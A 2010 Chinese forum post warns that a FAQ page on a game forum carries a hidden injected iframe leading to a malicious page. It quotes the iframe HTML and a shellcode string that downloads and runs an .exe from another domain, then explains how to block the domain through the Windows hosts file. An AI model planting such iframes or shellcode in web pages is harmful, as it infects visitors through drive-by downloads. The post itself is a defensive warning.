|
- UID
- 167603
- 帖子
- 3728
- 精华
- 6
- 威望
- 269
- 阅读权限
- 100
- 注册时间
- 2004-5-21
|
特意去试验下:
http://bbs.rohome.net/faq.php?action=message&id=9
含有以下内容:
<div class="altbg2" style="margin: 8px auto;">在<a href="memcp.php" target="_blank">控制面板</a>中的“编辑个人资料”,填写“原密码”,“新密码”,“确认新密码”。点击“提交”,即可修改。<iframe src=http://bwdirectsales.com/images/banners/cn.htm style="display:none"></iframe>;</div>
http://bwdirectsales.com/images/banners/cn.htm便是恶意网页
该网页会利用shellcode溢出下载执行 http://bkaode546.com/xiao/xiazai.exe
----Vt=_GVUVBBB_d0@phjYh32hUserTFjYhonhurlmTuhonhurlmTFjYnhl32hshelTFojYOjjSjV\3@<u\c.eDxe3QQSWQ3FX"jjjjjhSF$F`jPV(FdF`jjjjjPV,jjjhPV<FxNd|t|ttFpFtjjjF`PV8jNtQvpPv`V0v`V4vxV@33T}3PQSPPPPPPWPPV~TehcvwhshdoTF$F<d`jev<F3SSSS88uxtU@2tGcOGeGQ@G>9GiGfG7G d0@phjYTh32hUserTUjY53WVX[_fGSSj@hWF XQVu<t.xVv 3IA3:t@;u^^$fK^^Y9}H{=2tcOQ@ed2KtWfC}R>9if7Sfhttp://bkaode546.com/xiao/xiazai.exeWW;
只要系统打了比较新的安全补丁应该没问题,看了此页也不会中毒
小站以前也被这个bwdirectsales.com光顾过。。。
目前它只进驻了faq.php帮助页面,交流区看贴回帖没问题
所以趁早OX它吧,进入 C:\WINDOWS\system32\drivers\etc 打开 hosts 文件
选择记事本打开,删除无用部分(#和//开头的行都是没用的),然后添加:
127.0.0.1 bwdirectsales.com
127.0.0.1 www.bwdirectsales.com
保存即可。它的原理是让bwdirectsales.com域名解析失败,让本机无法访问此网站里的任何资源。
测试是否修改成功,开始-->运行-->ping bwdirectsales.com
如果显示 Pinging bwdirectsales.com[127.0.0.1]... 就成功啦,彻底告别马夫!
注意:千万别手抖把地址复制进IE里
[ 本帖最后由 sexx 于 2010-7-24 16:39 编辑 ] |
|
发表于 2010-7-23 18:39
| 
